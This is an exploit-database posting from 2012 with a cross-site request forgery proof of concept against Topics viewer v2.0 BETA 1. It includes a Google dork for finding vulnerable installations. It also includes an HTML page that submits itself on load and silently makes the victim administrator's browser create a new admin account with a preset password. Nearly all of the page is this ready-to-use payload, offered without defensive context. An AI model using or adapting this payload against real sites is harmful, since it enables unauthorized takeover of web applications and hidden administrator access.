Home / exploits

PDF

Topics Viewer Cross Site Request Forgery

Posted on 01 March 2012

# Exploit Title: Topics viewer CSRF Add Admin
# Google Dork: (allintext: Topics viewer v 2.0 BETA 1)
# Date: 28-02-2012
# Author: The Green Hornet thegreenhornet95@gmail.com
# Software Link: http://www.traidnt.net/Portal/Sites/Scripts/topics-viewer-v2.0-beta-1-traidnt.net.html
# Version:2.0 BETA 1
+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+
<html>
<body onload="javascript:document.forms[0].submit()">
<p>by:thegreenhornet</p>
<form method="POST" name="form0" action="
http://localhost/top/admincp/main.php?op=add-admin">
<input type="hidden" name="u_name" value="admin2"/>
<input type="hidden" name="u_m_pass" value="123456"/>
<input type="hidden" name="u_email" value="WW22@rwoot.com"/>
</form>
</body>
+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+
all7mdo l allah.

 

TOP